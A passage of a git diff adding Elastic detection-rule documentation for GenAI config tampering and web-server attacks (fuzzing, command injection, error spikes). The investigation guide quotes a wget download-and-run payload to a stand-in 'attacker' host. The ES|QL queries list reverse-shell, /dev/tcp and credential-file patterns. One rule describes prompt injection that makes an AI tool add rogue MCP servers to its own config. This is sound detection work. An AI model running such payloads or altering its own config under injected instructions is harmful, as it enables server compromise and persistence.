compromised dependencies, and prompt injection attacks that abuse the GenAI tool itself to modify its own configuration. Unauthorized MCP servers added to these configs execute arbitrary commands when the AI tool is next invoked. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://modelcontextprotocol.io/ +* https://www.cybereason.com/blog/security-research/weaponized-ai-how-cybercriminals-exploit-mcp-for-account-takeover +* https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks +* https://www.elastic.co/security-labs/elastic-advances-llm-security + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Unusual Process Modifying GenAI Configuration File* + + +Configuration files for GenAI tools like Cursor, Claude, Copilot, and Ollama control which MCP servers, plugins, and extensions are loaded. Attackers target these files to inject malicious MCP servers that execute arbitrary commands, exfiltrate data, or establish persistence. Threats include external processes (malware, compromised scripts, supply chain attacks) directly modifying configs, as well as prompt injection attacks that abuse the AI tool's own file access capabilities. + + +*Possible investigation steps* + + +- Identify the process that modified the configuration file and determine if it's expected (GenAI tool, installer, user action) or suspicious (unknown script, malware). +- If the modifying process is NOT a GenAI tool, investigate its origin, parent process tree, and whether it was downloaded or executed from a suspicious location. +- If a GenAI tool made the modification, check recent user prompts or agent activity that may have triggered the config change via prompt injection. +- Review the contents of the modified configuration file for suspicious MCP server URLs, unauthorized plugins, or unusual agent permissions. +- Examine the process command line and parent process tree to identify how the modifying process was invoked. +- Check for other file modifications by the same process around the same time, particularly to other GenAI configs or startup scripts. +- Investigate whether the GenAI tool subsequently connected to unknown domains or spawned unusual child processes after the config change. + + +*False positive analysis* + + +- Novel but legitimate configuration changes will trigger this rule when the process hasn't been seen modifying these files within the configured history window. Review the modified file content to determine legitimacy. +- GenAI tool updates may modify config files in new ways; correlate with recent software updates. +- IDE extensions integrating with GenAI tools may modify configs as part of initial setup. +- Developer tools (git, go, npm) checking out or downloading projects containing `.gemini/` or `.claude/` directories may trigger alerts. These are project-level configs, not user configs - verify by checking if the path is within a project directory. + + +*Response and remediation* + + +- Review the modified configuration file and revert any unauthorized changes to MCP servers, plugins, or agent settings. +- If malicious MCP servers were added, block the associated domains at the network level. +- Review and rotate any API keys or credentials that may have been exposed through the compromised GenAI configuration. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category : "file" and event.action : ("modification" or "overwrite") and +file.path : ( + */.cursor/mcp.json or */.cursor/settings.json or */AppData/Roaming/Cursor/*mcp* or + */.claude/* or */claude_desktop_config.json or */AppData/Roaming/Claude/* or + */.config/github-copilot/* or */AppData/Local/GitHub?Copilot/* or + */.ollama/config* or */AppData/Local/Ollama/* or + */.codex/* or */AppData/Roaming/Codex/* or + */.gemini/* or */AppData/Roaming/gemini-cli/* or + */.grok/* or */AppData/Roaming/Grok/* or + */.windsurf/* or */AppData/Roaming/Windsurf/* or + */.vscode/extensions/*mcp* or + */.openclaw/* or */AppData/Roaming/OpenClaw/* or + */.moltbot/* or */AppData/Roaming/Moltbot/* or + */.config/openclaw/* +) and not ( + file.extension : (lck or lock or log or png or marker) or + file.name : .DS_Store or + file.path : ( + */.claude/cache/* or + */.claude/statsig/* or + */.codex/log/* or + */.codex/sessions/* + ) or + ( + file.path : */.config/github-copilot/* and + file.name : (apps.json or versions.json or copilot*nitrite.db) + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Host Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc new file mode 100644 index 0000000000..3b89cbdea8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity]] +=== Web Server Discovery or Fuzzing Activity + +This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 10m + +*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Web Server Discovery or Fuzzing Activity* + + +This rule flags a single origin generating a rapid burst of GET requests that produce many 404/403 responses, a hallmark of automated web discovery or fuzzing. Attackers commonly run wordlist-driven enumeration to probe paths such as /admin/, /login, /backup.zip, /.env, /.git/, and undocumented API routes, gauging which resources exist and where access controls fail. Detecting this reconnaissance early helps prevent subsequent targeted exploitation of newly found endpoints and weak authentication flows. + + +*Possible investigation steps* + + +- Correlate user-agent, TLS JA3/JA4, Host/SNI, and X-Forwarded-For to fingerprint the client, identify common fuzzing tools or disguised automation, and recover the true origin if traffic traversed a CDN or proxy. +- Summarize the top requested paths and response codes for this source to spot any 2xx or 401 outcomes amid the denials, flagging hits on sensitive locations such as /.env, /.git, /admin interfaces, backups, installer scripts, and undocumented API routes. +- Pivot to the same timeframe for adjacent web and authentication activity from this origin to see whether POSTs, credential attempts, or parameterized requests followed the enumeration, indicating progression toward exploitation or spraying. +- Review WAF/CDN and reverse-proxy logs for blocks, challenges, or rate limiting and whether multiple virtual hosts were targeted via the Host header, confirming if and how far requests reached the application tier. +- Validate whether the source aligns with approved internal scanners or scheduled testing via inventories and change records, and if not, enrich with ASN/geolocation, reverse DNS, and threat intel to assess reputation and recurrence across your estate. + + +*False positive analysis* + + +- An internal QA link checker or monitoring crawler run from a single host can request hundreds of unique paths and generate many 404/403 GETs when routes, assets, or permissions are misconfigured. +- A shared egress IP (NAT or corporate proxy) aggregating many users during a faulty deployment can trigger high volumes of 404/403 GETs as browsers collectively hit moved or newly restricted resources. + + +*Response and remediation* + + +- Immediately rate-limit or block the offending source IP at the WAF/CDN and reverse proxy, applying a challenge or temporary ban to the observed User-Agent and JA3/JA4 fingerprint driving the 500+ unique-path 404/403 GET burst. +- If traffic came through a proxy or CDN, use X-Forwarded-For to identify and block the true origin, and add a temporary ASN or geolocation block if the source aligns with known scanner networks. +- Verify whether the source is an approved internal scanner; if not, disable the job or container, remove any scheduled tasks and API keys used, and notify the owner to stop testing against production immediately. +- Review the requested path list to identify any 2xx or 401 hits and remediate exposures such as accessible /.env, /.git, /admin interfaces, backup archives, or installer scripts by removing files, disabling endpoints, and rotating secrets. +- Escalate to incident response if enumeration persists after blocking, pivots to POSTs or credential attempts, originates from rotating IPs (Tor/VPN/residential), or produces 2xx on sensitive endpoints despite WAF rules. +- Harden the web tier by enabling per-IP rate limiting and bot challenges, turning off directory listing and default app endpoints, blocking patterns like /.git/, /.env, and /backup.zip at the WAF, and restricting origin access to CDN egress only. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code in (404, 403) + +| eval Esql.url_original_to_lower = to_lower(url.original) + +| keep + @timestamp, + event.dataset, + http.request.method, + http.response.status_code, + source.ip, + agent.id, + agent.name, + Esql.url_original_to_lower, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_original_values = values(Esql.url_original_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip +| where + Esql.event_count > 500 and Esql.url_original_count_distinct > 250 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc new file mode 100644 index 0000000000..024676b0dc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc @@ -0,0 +1,229 @@ +[[prebuilt-rule-8-19-18-web-server-potential-command-injection-request]] +=== Web Server Potential Command Injection Request + +This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 10m + +*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Tactic: Persistence +* Tactic: Execution +* Tactic: Credential Access +* Tactic: Command and Control +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Web Server Potential Command Injection Request* + + +This rule flags web requests whose URLs embed command-execution payloads—interpreter flags, shell invocations, netcat reverse shells, /dev/tcp, base64, credential file paths, downloaders, and suspicious temp or cron paths. It matters because attackers use low-volume, successful (200) requests to trigger server-side command injection and gain persistence or control without obvious errors. Example: a crafted query executes bash -c 'wget http://attacker/rev.sh -O /tmp/r; chmod +x /tmp/r; /tmp/r' from the web app, yielding a 200 while dropping and running a payload. + + +*Possible investigation steps* + + +- Pull the raw HTTP request or PCAP, repeatedly URL-decode and base64-decode parameters, and extract shell metacharacters, commands, IP:port pairs, file paths, and download URLs to infer execution intent. +- Time-correlate the request with host telemetry for web-server-owned child processes, file writes in /tmp, /dev/shm, or web roots, cron modifications, and new outbound connections from the same host. +- Pivot on the source IP and user-agent to find related requests across other hosts/endpoints, identify scan-to-exploit sequencing and success patterns, and enact blocking or rate limiting if malicious. +- Map the targeted route to its backend handler and review code/config to see if user input reaches exec/system/os.popen, templating/deserialization, or shell invocations, then safely reproduce in staging to validate exploitability. +- If the payload references external indicators, search DNS/proxy/firewall telemetry for matching egress, retrieve and analyze any downloaded artifacts, and hunt for the same indicators across the fleet. + + +*False positive analysis* + + +- A documentation or code-rendering page that echoes command-like strings from query parameters (e.g., "bash -c", "python -c", "curl", "/etc/passwd") returns 200 while merely displaying text, so the URL contains payload keywords without any execution. +- A low-volume developer or QA test to a sandbox route includes path or query values like "/dev/tcp/", "nc 10.0.0.1 4444", "busybox", or "chmod +x" to validate input handling, the server returns 200 and the rule triggers despite no server-side execution path consuming those parameters. + + +*Response and remediation* + + +- Block the offending source IPs and User-Agents at the WAF/reverse proxy, add virtual patches to drop URLs containing 'bash -c', '/dev/tcp', 'base64 -d', 'curl' or 'nc', and remove the targeted route from the load balancer until verified safe. +- Isolate the impacted host from the network (at minimum egress) if the web service spawns child processes like bash/sh/python -c, creates files in /tmp or /dev/shm, modifies /etc/cron.*, or opens outbound connections to an IP:port embedded in the request. +- Acquire volatile memory and preserve access/error logs and any downloaded script before cleanup, then terminate malicious child processes owned by nginx/httpd/tomcat/w3wp, delete dropped artifacts (e.g., /tmp/*, /dev/shm/*, suspicious files in the webroot), and revert cron/systemd or SSH key changes. +- Rotate credentials and tokens if /etc/passwd, /etc/shadow, or ~/.ssh paths were targeted, rebuild the host or container from a known-good image, patch the application and dependencies, and validate clean startup with outbound traffic restricted to approved destinations. +- Immediately escalate to the incident commander and legal/privacy if remote command execution is confirmed (evidence: web-server-owned 'bash -c' or 'python -c' executed, curl/wget download-and-execute, or reverse shell to an external IP:port) or if sensitive data exposure is suspected. +- Harden by enforcing strict input validation, disabling shell/exec functions in the runtime (e.g., PHP disable_functions and no shell-outs in templates), running under least privilege with noexec,nodev /tmp and a read-only webroot, restricting egress by policy, and deploying WAF rules and host sensors to detect these strings and cron/webshell creation. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-* +| where + // Limit to 200 response code to reduce noise + http.response.status_code == 200 + +| eval Esql.url_original_to_lower = to_lower(url.original) + +| eval Esql.contains_interpreter = case(Esql.url_original_to_lower like "*python* -c*" or Esql.url_original_to_lower like "*perl* -e*" or Esql.url_original_to_lower like "*ruby* -e*" or Esql.url_original_to_lower like "*ruby* -rsocket*" or Esql.url_original_to_lower like "*lua* -e*" or Esql.url_original_to_lower like "*php* -r*" or Esql.url_original_to_lower like "*node* -e*", 1, 0) +| eval Esql.contains_shell = case(Esql.url_original_to_lower like "*/bin/bash*" or Esql.url_original_to_lower like "*bash*-c*" or Esql.url_original_to_lower like "*/bin/sh*" or Esql.url_original_to_lower rlike "*sh.{1,2}-c*", 1, 0) +| eval Esql.contains_nc = case(Esql.url_original_to_lower like "*netcat*" or Esql.url_original_to_lower like "*ncat*" or Esql.url_original_to_lower rlike """.*nc.{1,2}[0-9]{1,3}(\.[0-9]{1,3}){3}.{1,2}[0-9]{1,5}.*""" or Esql.url_original_to_lower like "*nc.openbsd*" or Esql.url_original_to_lower like "*nc.traditional*" or Esql.url_original_to_lower like "*socat*", 1, 0) +| eval Esql.contains_devtcp = case(Esql.url_original_to_lower like "*/dev/tcp/*" or Esql.url_original_to_lower like "*/dev/udp/*", 1, 0) +| eval Esql.contains_helpers = case((Esql.url_original_to_lower like "*/bin/*" or Esql.url_original_to_lower like "*/usr/bin/*") and (Esql.url_original_to_lower like "*mkfifo*" or Esql.url_original_to_lower like "*nohup*" or Esql.url_original_to_lower like "*setsid*" or Esql.url_original_to_lower like "*busybox*"), 1, 0) +| eval Esql.contains_sus_cli = case(Esql.url_original_to_lower like "*import*pty*spawn*" or Esql.url_original_to_lower like "*import*subprocess*call*" or Esql.url_original_to_lower like "*tcpsocket.new*" or Esql.url_original_to_lower like "*tcpsocket.open*" or Esql.url_original_to_lower like "*io.popen*" or Esql.url_original_to_lower like "*os.execute*" or Esql.url_original_to_lower like "*fsockopen*", 1, 0) +| eval Esql.contains_privileges = case(Esql.url_original_to_lower like "*chmod*+x", 1, 0) +| eval Esql.contains_downloader = case(Esql.url_original_to_lower like "*curl *" or Esql.url_original_to_lower like "*wget *" , 1, 0) +| eval Esql.contains_file_read_keywords = case(Esql.url_original_to_lower like "*/etc/shadow*" or Esql.url_original_to_lower like "*/etc/passwd*" or Esql.url_original_to_lower like "*/root/.ssh/*" or Esql.url_original_to_lower like "*/home/*/.ssh/*" or Esql.url_original_to_lower like "*~/.ssh/*" or Esql.url_original_to_lower like "*/proc/self/environ*", 1, 0) +| eval Esql.contains_base64_cmd = case(Esql.url_original_to_lower like "*base64*-d*" or Esql.url_original_to_lower like "*echo*|*base64*", 1, 0) +| eval Esql.contains_suspicious_path = case(Esql.url_original_to_lower like "*/tmp/*" or Esql.url_original_to_lower like "*/var/tmp/*" or Esql.url_original_to_lower like "*/dev/shm/*" or Esql.url_original_to_lower like "*/root/*" or Esql.url_original_to_lower like "*/home/*/*" or Esql.url_original_to_lower like "*/var/www/*" or Esql.url_original_to_lower like "*/etc/cron.*/*", 1, 0) + +| eval Esql.any_payload_keyword = case( + Esql.contains_interpreter == 1 or Esql.contains_shell == 1 or Esql.contains_nc == 1 or Esql.contains_devtcp == 1 or + Esql.contains_helpers == 1 or Esql.contains_sus_cli == 1 or Esql.contains_privileges == 1 or Esql.contains_downloader == 1 or + Esql.contains_file_read_keywords == 1 or Esql.contains_base64_cmd == 1 or Esql.contains_suspicious_path == 1, 1, 0) + +| keep + @timestamp, + Esql.url_original_to_lower, + Esql.any_payload_keyword, + Esql.contains_interpreter, + Esql.contains_shell, + Esql.contains_nc, + Esql.contains_devtcp, + Esql.contains_helpers, + Esql.contains_sus_cli, + Esql.contains_privileges, + Esql.contains_downloader, + Esql.contains_file_read_keywords, + Esql.contains_base64_cmd, + Esql.contains_suspicious_path, + source.ip, + destination.ip, + agent.id, + http.request.method, + http.response.status_code, + user_agent.original, + agent.name, + event.dataset, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_path_count_distinct = count_distinct(Esql.url_original_to_lower), + + // General fields + + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.url_path_values = values(Esql.url_original_to_lower), + Esql.http.response.status_code_values = values(http.response.status_code), + Esql.user_agent_original_values = values(user_agent.original), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace), + + // Rule Specific fields + Esql.any_payload_keyword_max = max(Esql.any_payload_keyword), + Esql.contains_interpreter_values = values(Esql.contains_interpreter), + Esql.contains_shell_values = values(Esql.contains_shell), + Esql.contains_nc_values = values(Esql.contains_nc), + Esql.contains_devtcp_values = values(Esql.contains_devtcp), + Esql.contains_helpers_values = values(Esql.contains_helpers), + Esql.contains_sus_cli_values = values(Esql.contains_sus_cli), + Esql.contains_privileges_values = values(Esql.contains_privileges), + Esql.contains_downloader_values = values(Esql.contains_downloader), + Esql.contains_file_read_keywords_values = values(Esql.contains_file_read_keywords), + Esql.contains_base64_cmd_values = values(Esql.contains_base64_cmd), + Esql.contains_suspicious_path_values = values(Esql.contains_suspicious_path) + + by source.ip, agent.id + +| where + // Filter for potential command injection attempts with low event counts to reduce false positives + Esql.any_payload_keyword_max == 1 and Esql.event_count < 5 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc new file mode 100644 index 0000000000..44b664b30f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes]] +=== Web Server Potential Spike in Error Response Codes + +This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 10m + +*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Web Server Potential Spike in Error Response Codes* + + +This rule detects bursts of 5xx errors (500–504) from GET traffic, highlighting abnormal server behavior that accompanies active scanning or fuzzing and exposes fragile code paths or misconfigured proxies. Attackers sweep common and generated endpoints while mutating query params and headers—path traversal, template syntax, large payloads—to repeatedly force backend exceptions and gateway timeouts, enumerate which routes fail, and pinpoint inputs that leak stack traces or crash components for follow-on exploitation. + + +*Possible investigation steps* + + +- Plot error rates per minute by server and client around the alert window to confirm the spike, determine scope, and separate a single noisy client from a platform-wide issue. +- Aggregate the failing URL paths and query strings from the flagged client and look for enumeration sequences, traversal encoding, template injection markers, or oversized inputs indicative of fuzzing. +- Examine User-Agent, Referer, header mix, and TLS JA3 for generic scanner signatures or reuse across multiple clients, and enrich the originating IP with reputation and hosting-provider attribution. +- Correlate the timeframe with reverse proxy/WAF/IDS and application error logs or stack traces to identify which routes threw exceptions or timeouts and whether they align with the client’s input patterns. +- Validate backend and dependency health (upstreams, databases, caches, deployments) to rule out infrastructure regressions, then compare whether only the suspicious client experiences disproportionate failures. + + +*False positive analysis* + + +- A scheduled deployment or upstream dependency issue can cause normal GET traffic to fail with 502/503/504, and many users egressing through a shared NAT or reverse proxy may be aggregated as one source IP that triggers the spike. +- An internal health-check, load test, or site crawler running from a single host can rapidly traverse endpoints and induce 500 errors on fragile routes, mimicking scanner-like behavior without malicious intent. + + +*Response and remediation* + + +- Immediately rate-limit or block the originating client(s) at the edge (reverse proxy/WAF) using the observed source IPs, User-Agent/TLS fingerprints, and the failing URL patterns generating 5xx bursts. +- Drain the origin upstream(s) showing repeated 500/502/503/504 on the probed routes, roll back the latest deployment or config change for those services, and disable any unstable endpoint or plugin that is crashing under input fuzzing. +- Restart affected application workers and proxies, purge bad cache entries, re-enable traffic gradually with canary percentage, and confirm normal response rates via synthetic checks against the previously failing URLs. +- Escalate to Security Operations and Incident Response if 5xx spikes persist after blocking or if error pages expose stack traces, credentials, or admin route disclosures, or if traffic originates from multiple global hosting ASNs. +- Deploy targeted WAF rules for path traversal and injection markers seen in the URLs, enforce per-IP and per-route rate limits, tighten upstream timeouts/circuit breakers, and replace verbose error pages with generic responses that omit stack details. +- Add bot management and IP reputation blocking at the CDN/edge, lock down unauthenticated access to admin/debug routes, and instrument alerts that trigger on sustained 5xx bursts per client and per route with automatic edge throttling. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code in ( + 500, // Internal Server Error + 502, // Bad Gateway + 503, // Service Unavailable + 504 // Gateway Timeout + ) + +| eval Esql.url_original_to_lower = to_lower(url.original) + +| keep + @timestamp, + event.dataset, + http.request.method, + http.response.status_code, + source.ip, + agent.id, + agent.name, + Esql.url_original_to_lower, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.http_response_status_code_count = count(http.response.status_code), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_path_values = values(Esql.url_original_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip, agent.id +| where + Esql.http_response_status_code_count > 10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc new file mode 100644 index 0000000000..1154e454c2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc @@ -0,0 +1,175 @@ +[[prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests]] +=== Web Server Suspicious User Agent Requests + +This rule detects unusual spikes in web server requests with uncommon or suspicious user-agent strings. Such activity may indicate reconnaissance attempts by attackers trying to identify vulnerabilities in web applications or servers. These user-agents are often associated with automated tools used for scanning, vulnerability assessment, or brute-force attacks. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 10m + +*Searches indices from*: now-11m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Tactic: Credential Access +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Web Server Suspicious User Agent Requests* + + +This rule flags surges of web requests that advertise scanner or brute-force tool user agents, signaling active reconnaissance against your web servers and applications. A common pattern is dirsearch or gobuster sweeping for hidden paths, firing hundreds of rapid GETs across diverse URLs from one host and probing admin panels, backup folders, and robots.txt. + + +*Possible investigation steps* + + +- Verify whether the activity aligns with approved scanners or uptime checks by cross-referencing inventories, allowlists, change windows, and egress ranges; otherwise enrich the originating IP with ASN, geolocation, and threat reputation to gauge risk. +- Sample representative requests to identify targeted paths and payloads (e.g., admin panels, .git/.env, backups, traversal, SQLi/XSS markers) and note any successful responses or downloads that indicate information exposure. +- Analyze request rate, methods, and status-code distribution to separate noisy recon from successful discovery or brute-force patterns, highlighting any POST/PUT with nontrivial bodies. +- Correlate the same client across hosts and security layers (application/auth logs, WAF/CDN, IDS) to determine whether it is scanning multiple services, triggering signatures, or attempting credential stuffing. +- Assess user-agent authenticity and evasiveness by comparing HTTP header order/values and TLS fingerprints (JA3/JA4) to expected clients, and verify true client identity via forwarded-for headers if behind a proxy or CDN. + + +*False positive 